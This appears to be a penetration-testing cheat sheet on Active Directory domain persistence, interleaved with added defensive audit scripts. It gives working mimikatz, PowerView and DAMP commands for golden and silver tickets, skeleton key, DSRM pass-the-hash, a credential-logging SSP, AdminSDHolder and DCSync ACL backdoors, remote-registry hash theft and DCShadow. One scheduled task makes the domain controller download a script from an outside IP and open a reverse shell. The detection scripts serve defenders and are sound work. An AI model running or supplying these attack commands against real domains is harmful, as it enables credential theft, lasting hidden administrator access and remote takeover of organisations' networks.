Persistence

Golden Ticket

```powershell
# Run as DA locally on DC to get krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

# Run remotely as DA to get krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

# Get Domain SID:
Get-DomainSID

# Get domain ticket policy:
(Get-DomainPolicy)."kerberos.policy"

# Create ticket:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

# Use ticket:
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

# Access:
ls \\domain-dc\c$
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\Administrator /domain:DOMAIN"'
```

Silver Ticket

```powershell
# Using DC$ hash to provide access to domain shares on DC:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN /sid:S-1-5-21-1874506631-3219952063-538504511 /target:DC.DOMAIN.local /service:CIFS /rc4:HASH /user:Administrator /ptt"'

# Create ticket for HOST (using DC$ hash) to allow us to schedule tasks on target:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:HOST /rc4:HASH /user:Administrator /ptt"'

## Schedule task with above silver ticket
schtasks /create /S dc.DOMAIN.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "User" /TR "powershell iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443"
schtasks /Run /S dc.DOMAIN.local /TN "User"

# To execute WMI, both HOST and RPCSS tickets are needed:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:RPCSS /rc4:HASH /user:Administrator /ptt"'
```
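Defender-side check for the two ticket-forging techniques above, added here as an example (it is not from the original page or from the tooling it references). Both attacks rest on a long-lived key: a golden ticket on the krbtgt password, a silver ticket on the target computer account's password, and neither forged ticket is visible to the DC at creation time, so the practical control is key rotation. The script uses the ActiveDirectory module to report the age of both; the thresholds (180 days for krbtgt, 60 days for computer accounts) are assumptions to adapt to your own policy.

```powershell
# Added example: report Kerberos key material old enough to make forged tickets worthwhile.
# Assumes the ActiveDirectory module is installed and the caller can read account attributes.
Import-Module ActiveDirectory

function Get-StaleKerberosKeys {
    param(
        [int]$KrbtgtMaxAgeDays   = 180,  # assumed threshold: rotate krbtgt at least twice a year
        [int]$ComputerMaxAgeDays = 60    # machine passwords rotate every 30 days by default
    )
    $now = Get-Date
    $findings = @()

    # Golden ticket: a TGT forged with the krbtgt key stays usable until that key has been
    # rotated twice (the KDC still honours the previous key), so krbtgt age is the exposure.
    $krbtgt = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
    $age = ($now - $krbtgt.PasswordLastSet).Days
    $findings += [pscustomobject]@{
        Type    = 'krbtgt'
        Account = $krbtgt.SamAccountName
        AgeDays = $age
        Stale   = ($age -gt $KrbtgtMaxAgeDays)
    }

    # Silver ticket: a forged service ticket is encrypted with the target machine account's
    # key and never touches the DC, so computer accounts that stopped rotating are the exposure.
    foreach ($c in Get-ADComputer -Filter * -Properties PasswordLastSet) {
        $age = if ($c.PasswordLastSet) { ($now - $c.PasswordLastSet).Days } else { -1 }
        $findings += [pscustomobject]@{
            Type    = 'computer'
            Account = $c.SamAccountName
            AgeDays = $age
            Stale   = ($age -lt 0) -or ($age -gt $ComputerMaxAgeDays)   # -1 means never set
        }
    }
    return $findings
}

# Print only the stale entries, oldest first.
Get-StaleKerberosKeys | Where-Object Stale | Sort-Object AgeDays -Descending | Format-Table -AutoSize
```

A krbtgt entry that is flagged means every golden ticket minted so far is still valid; resetting krbtgt twice (with a replication interval between the resets) invalidates them. A flagged computer account usually indicates a stale or cloned machine whose DC$-style key can be reused indefinitely for silver tickets.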

Skeleton Key

```powershell
# Creating skeleton key
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.DOMAIN.local

# Using Skeleton Key (password is "mimikatz")
Enter-PSSession -ComputerName dc -Credential DOMAIN\Administrator
```

DSRM (Directory Services Restore Mode)

The DSRM password is set when a DC is promoted and is the password of the DC's local Administrator account. With a registry change, the DSRM hash can be used in a pass-the-hash (PTH) attack. This gives DA that is very unlikely to change.
```powershell
# Dump DSRM passwords (requires DA):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc

# Change Reg:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Pass the DSRM hash:
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc /user:Administrator /ntlm:HASH /run:powershell.exe"'
```

Custom SSP

A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Some SSP Packages by Microsoft are NTLM, Kerberos, Wdigest, CredSSP. Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.
```powershell
# Drop the mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages:
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

# Using mimikatz, inject into lsass (not stable with Server 2016):
Invoke-Mimikatz -Command '"misc::memssp"'

# All logons are now logged in clear text too:
C:\Windows\system32\kiwissp.log
```
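The DSRM, Skeleton Key and Custom SSP techniques above all leave or depend on state under the LSA registry key, so one audit script run on each DC covers all three. This is an added example and not code from the original page or from mimikatz. The list of expected security packages is an assumption (the Windows defaults), and the file paths checked are the ones the page itself names; extend both for packages you have deployed on purpose.

```powershell
# Added example: audit the LSA settings and artefacts tied to the three persistence
# methods above. Run elevated on each domain controller.
function Get-LsaPersistenceFindings {
    $lsa      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $osconfig = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
    # Assumed baseline: packages Windows registers by default (plus the empty "" placeholder).
    $expectedPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap', '""')
    $findings = @()

    # DSRM: DsrmAdminLogonBehavior should be absent or 0. A value of 2 (what the page sets)
    # lets the DSRM account authenticate over the network while AD DS is running.
    $dsrm = (Get-ItemProperty -Path $lsa -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
    if ($dsrm -and $dsrm -ne 0) {
        $findings += "DsrmAdminLogonBehavior is $dsrm (expected absent or 0)"
    }

    # Skeleton Key / memssp: both patch lsass in memory. With RunAsPPL=1 (LSA protection) an
    # unsigned process cannot open lsass for write, which forces the attacker to load a driver
    # and makes the attempt far noisier. Flag DCs where protection is off.
    $ppl = (Get-ItemProperty -Path $lsa -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
    if ($ppl -ne 1) {
        $findings += "RunAsPPL is not 1 (LSA protection disabled)"
    }

    # Custom SSP: any name outside the baseline in either 'Security Packages' value is loaded
    # into lsass at the next boot and must be explained.
    foreach ($key in @($lsa, $osconfig)) {
        $packages = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($p in @($packages)) {
            if ($p -and ($expectedPackages -notcontains $p.ToLower())) {
                $findings += "Unexpected security package '$p' in $key"
            }
        }
    }

    # On-disk artefacts named on the page: the dropped SSP and its clear-text logon log.
    foreach ($path in @("$env:SystemRoot\System32\mimilib.dll", "$env:SystemRoot\System32\kiwissp.log")) {
        if (Test-Path -Path $path) { $findings += "File present: $path" }
    }
    return $findings
}

$result = Get-LsaPersistenceFindings
if ($result) { $result | ForEach-Object { Write-Output "FINDING: $_" } }
else         { Write-Output "No LSA persistence indicators found." }
```

The registry checks only catch the variants that persist across reboots; a Skeleton Key or memssp injected purely in memory disappears on restart, so a DC that is rebooted after a suspected compromise removes the evidence along with the implant. Collect lsass memory first if forensics matter.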

ACL Abuse - AdminSDHolder

AdminSDHolder resides in the System container of a domain and is used to control the permissions, via an ACL, of certain built-in privileged groups (called Protected Groups). SDProp propagates its ACL across AD every hour.
PowerView:
```powershell
# Giving a user full rights over AdminSDHolder groups:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose

# Giving user reset password rights:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose

# Giving user WriteMember privs:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose

# Check Domain Admins permission as normal user:
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}

# Abuse FullControl (powerview_dev):
Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose

# Abusing ResetPassword (powerview_dev):
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "[email protected]" -AsPlainText -Force) -Verbose

# Add DCSync rights to a user:
Add-ObjectAcl -TargetDistinguishedName 'DC=DOMAIN,DC=local' -PrincipalSamAccountName student1 -Rights DCSync -Verbose
```
ADModule:
```powershell
# Giving a user full rights over AdminSDHolder groups:
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -Verbose

# Check Domain Admins permission as normal user:
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'}

# Abuse FullControl:
Add-ADGroupMember -Identity 'Domain Admins' -Members testda

# Abusing ResetPassword:
Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "[email protected]" -AsPlainText -Force) -Verbose

# Add DCSync rights:
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -GUIDRight DCSync -Verbose
```
```powershell
# Run SDProp manually using Invoke-SDPropagator.ps1:
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

# For pre-Server 2008 machines:
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose
```
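The page's own check (`Get-ObjectAcl ... -match 'student1'`) looks for one known principal. The defender's version of the same query, added here as an example and not taken from the page or from PowerView, is the inverse: list every write-class ACE on AdminSDHolder, and every replication (DCSync) ACE on the domain head, whose trustee is not one of the principals that holds those rights by design. It uses the ActiveDirectory module's `AD:` drive, the same one the ADModule tab uses. The list of expected trustees is an assumption drawn from the Windows defaults; extend it for legitimate delegations in your forest (Exchange, backup or directory-sync accounts, for instance).

```powershell
# Added example: find non-default principals who could abuse AdminSDHolder or DCSync.
# Assumes the ActiveDirectory module and read access to the ACLs; the expected-trustee
# pattern is an assumption to adapt per forest.
Import-Module ActiveDirectory

$domainDN = (Get-ADDomain).DistinguishedName
$expectedPattern = '\\(SYSTEM|SELF|Administrators|Domain Admins|Enterprise Admins|Domain Controllers|' +
                   'Enterprise Read-only Domain Controllers|ENTERPRISE DOMAIN CONTROLLERS|Cert Publishers|' +
                   'Terminal Server License Servers|Windows Authorization Access Group|Pre-Windows 2000 Compatible Access)$'
$writeRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight|Self'
$dsReplGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'    # DS-Replication-Get-Changes-All
)
$allObjects = '00000000-0000-0000-0000-000000000000' # ExtendedRight with null GUID = every control access right

# Write-class ACEs on AdminSDHolder from non-default principals. SDProp copies such an ACE
# onto every protected group and account within the hour, which is what Add-ObjectAcl and
# Set-ADACL above rely on.
function Get-AdminSdHolderFindings {
    $acl = Get-Acl -Path "AD:\CN=AdminSDHolder,CN=System,$domainDN"
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.ActiveDirectoryRights.ToString() -match $writeRights -and
        $_.IdentityReference.Value -notmatch $expectedPattern
    } | Select-Object IdentityReference, ActiveDirectoryRights, ObjectType, IsInherited
}

# Principals able to DCSync: GenericAll on the domain head, or ExtendedRight scoped to
# either replication control access right (or to all rights via the null GUID).
function Get-DcSyncFindings {
    $acl = Get-Acl -Path "AD:\$domainDN"
    $acl.Access | Where-Object {
        $rights = $_.ActiveDirectoryRights.ToString()
        $guid   = $_.ObjectType.ToString()
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -notmatch $expectedPattern -and
        ( $rights -match 'GenericAll' -or
          ($rights -match 'ExtendedRight' -and ($guid -eq $allObjects -or $dsReplGuids -contains $guid)) )
    } | Select-Object IdentityReference, ActiveDirectoryRights, ObjectType
}

Write-Output '== AdminSDHolder write ACEs from non-default principals =='
Get-AdminSdHolderFindings | Format-Table -AutoSize
Write-Output '== Replication (DCSync) rights from non-default principals =='
Get-DcSyncFindings | Format-Table -AutoSize
```

Because SDProp re-stamps protected objects hourly, fixing a rogue ACE on a single group such as Domain Admins is not enough: the entry must be removed from AdminSDHolder itself, after which running `Invoke-SDPropagator` (or waiting an hour) pushes the clean ACL back out.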

ACL Abuse - Security Descriptors

It is possible to modify Security Descriptors (security information like Owner, primary group, DACL and SACL) of multiple remote access methods (securable objects) to allow access to non-admin users. This is rarely checked.
WMI:
```powershell
# On local machine for student1:
Set-RemoteWMI -UserName student1 -Verbose

# On remote machine for student1 without explicit credentials:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

# On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose

# On remote machine, remove permissions:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose
```
PSRemote:
```powershell
# On local machine for student1:
Set-RemotePSRemoting -UserName student1 -Verbose

# On remote machine for student1 without credentials:
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Verbose

# On remote machine, remove the permissions:
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Remove
```
Remote Registry:
```powershell
# Using DAMP, with admin privs on remote machine:
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose

# As student1, retrieve machine account hash:
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

# Retrieve local account hash:
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose

# Retrieve domain cached credentials:
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
```
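The section notes that these security descriptors are rarely checked. The script below, added here as an example (not from the page, nor from the Set-RemoteWMI, Set-RemotePSRemoting or DAMP tooling), reads the trustees on all three surfaces on one host so that a principal like `student1` stands out. It is meant to be run elevated on the host being audited. The pattern of expected trustees is an assumption built from the Windows defaults, and the list of registry keys beyond `winreg` is an assumption about where a remote-registry backdoor lands; adjust both.

```powershell
# Added example: enumerate trustees on the WMI namespace, PSRemoting endpoints and the
# remote-registry keys, reporting anything outside an assumed default set.
function Get-RemoteAccessTrustees {
    param(
        # Assumed defaults; extend for groups you delegate on purpose.
        [string]$ExpectedPattern = 'SYSTEM|Administrators|Backup Operators|LOCAL SERVICE|NETWORK SERVICE|' +
                                   'Remote Management Users|INTERACTIVE|Authenticated Users|Everyone|' +
                                   'Performance Log Users|Distributed COM Users|LICENSE SERVERS|NT VIRTUAL MACHINE|' +
                                   'CREATOR OWNER|RESTRICTED|TrustedInstaller|WMI_Users'
    )
    $findings = @()

    # WMI: the DACL of root\cimv2 is exposed through the __SystemSecurity class. Set-RemoteWMI
    # adds an ACE for the target user here (and on nested namespaces).
    $sec = Get-WmiObject -Namespace 'root\cimv2' -Class __SystemSecurity
    $sd  = $sec.GetSecurityDescriptor().Descriptor
    foreach ($ace in $sd.DACL) {
        $name = "$($ace.Trustee.Domain)\$($ace.Trustee.Name)"
        if ($name -notmatch $ExpectedPattern) {
            $findings += [pscustomobject]@{ Surface = 'WMI root\cimv2'; Trustee = $name; Rights = ('0x{0:x}' -f $ace.AccessMask) }
        }
    }

    # PSRemoting: each session configuration carries an SDDL; Permission renders it as
    # "<trustee> AccessAllowed, ..." which is what Set-RemotePSRemoting modifies.
    foreach ($cfg in Get-PSSessionConfiguration) {
        foreach ($perm in ("$($cfg.Permission)" -split ',\s*')) {
            if ($perm -and $perm -notmatch $ExpectedPattern) {
                $findings += [pscustomobject]@{ Surface = "PSRemoting $($cfg.Name)"; Trustee = $perm; Rights = '' }
            }
        }
    }

    # Remote Registry: the winreg key gates remote registry access; a backdoor that hands out
    # SAM/LSA secrets also needs read on the hive keys, so those are listed too (assumed set).
    $keys = @('HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg', 'HKLM:\SAM', 'HKLM:\SECURITY')
    foreach ($key in $keys) {
        $acl = Get-Acl -Path $key -ErrorAction SilentlyContinue
        if (-not $acl) { continue }   # SAM and SECURITY are only readable as SYSTEM
        foreach ($ace in $acl.Access) {
            $name = $ace.IdentityReference.Value
            if ($name -notmatch $ExpectedPattern) {
                $findings += [pscustomobject]@{ Surface = "Registry $key"; Trustee = $name; Rights = "$($ace.RegistryRights)" }
            }
        }
    }
    return $findings
}

Get-RemoteAccessTrustees | Format-Table -AutoSize
```

Run it from a SYSTEM context (for example via a scheduled task) if the hive keys must be covered, since their ACLs are not readable by ordinary administrators. An empty result means every trustee matched the expected pattern, not that the descriptors are untouched, so keep the pattern tight.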

DCShadow - Forest Persistence

The machine needs to be part of the parent domain; this can be changed in System Properties with admin access and requires a computer restart. The user must also be a valid user in that domain, so they may need to be added first.
Requires two consoles: one as DA, one as SYSTEM. SYSTEM sets up the fake DC, DA pushes the replication.
```powershell
# Setting up fake DC (SYSTEM terminal)
.\mimikatz.exe
mimikatz# !+
mimikatz# !processtoken
mimikatz# lsadump::dcshadow /object:targetuser /attribute:serviceprincipalname /value:uniquespn/DC1

# On DA terminal
mimikatz -command '"lsadump::dcshadow /push"'
```
Granting a user the DCShadow permissions lets them repeat the attack without DA privileges, which is the persistence step. Once granted, the user can run the /push terminal without DA; the first terminal still needs SYSTEM privileges.
```powershell
Set-DCShadowPermissions -FakeDC USER -SAMAccountName USER -Username studentx -Verbose
```
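DCShadow works by registering the attacker's machine as a domain controller in the forest-wide Configuration partition just long enough to push a change, and the persistence variant above delegates the rights needed to do that again. The following check, added here as an example and not taken from the page or from mimikatz, looks for the three things that leaves behind: a server object under CN=Sites that is not a real DC, DC-style SPNs on a non-DC computer account, and write rights on CN=Sites held by a non-default principal. That last location is an assumption about where the delegation lands; the expected-trustee list is likewise an assumption to adapt.

```powershell
# Added example: look for rogue-DC registrations and the delegation that enables them.
# Assumes the ActiveDirectory module and read access to the Configuration partition.
Import-Module ActiveDirectory

function Get-RogueDcIndicators {
    $findings = @()
    $configNC = (Get-ADRootDSE).configurationNamingContext

    # FQDNs of every real DC in the forest, lower-cased for comparison.
    $knownDcs = foreach ($d in (Get-ADForest).Domains) {
        foreach ($dc in Get-ADDomainController -Filter * -Server $d) { $dc.HostName.ToLower() }
    }

    # 1. Server objects under CN=Sites whose host is not a known DC. DCShadow registers the
    #    attacker machine here for the duration of the push, so this catches one in flight
    #    or one whose cleanup failed.
    $servers = Get-ADObject -SearchBase "CN=Sites,$configNC" -LDAPFilter '(objectClass=server)' -Properties dNSHostName
    foreach ($s in $servers) {
        $fqdn = "$($s.dNSHostName)".ToLower()
        if ($knownDcs -notcontains $fqdn) {
            $findings += [pscustomobject]@{ Indicator = 'server object in CN=Sites'; Object = $s.DistinguishedName }
        }
    }

    # 2. Computer accounts carrying DC-style SPNs (GC/ or the DRS replication SPN) that are
    #    not DCs. The fake DC's computer object is given these so the real DCs will talk to it.
    $spnFilter = '(|(servicePrincipalName=GC/*)(servicePrincipalName=E3514235-4B06-11D1-AB04-00C04FC2DCD2/*))'
    foreach ($c in Get-ADComputer -LDAPFilter $spnFilter -Properties DNSHostName) {
        $fqdn = "$($c.DNSHostName)".ToLower()
        if ($knownDcs -notcontains $fqdn) {
            $findings += [pscustomobject]@{ Indicator = 'DC SPN on non-DC computer'; Object = $c.DistinguishedName }
        }
    }

    # 3. Non-default principals with write or create rights on CN=Sites (assumed location of
    #    the delegation made by Set-DCShadowPermissions).
    $expected = '\\(SYSTEM|SELF|Administrators|Enterprise Admins|Domain Admins|' +
                'Enterprise Read-only Domain Controllers|ENTERPRISE DOMAIN CONTROLLERS)$'
    $acl = Get-Acl -Path "AD:\CN=Sites,$configNC"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $ace.ActiveDirectoryRights.ToString() -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|CreateChild' -and
            $ace.IdentityReference.Value -notmatch $expected) {
            $findings += [pscustomobject]@{ Indicator = 'write ACE on CN=Sites'; Object = "$($ace.IdentityReference) : $($ace.ActiveDirectoryRights)" }
        }
    }
    return $findings
}

Get-RogueDcIndicators | Format-Table -AutoSize
```

Indicators 1 and 2 are transient (mimikatz removes them after the push), so schedule this check frequently or pair it with alerting on computer-object SPN changes; indicator 3 is the durable one and is what the persistence variant of DCShadow depends on.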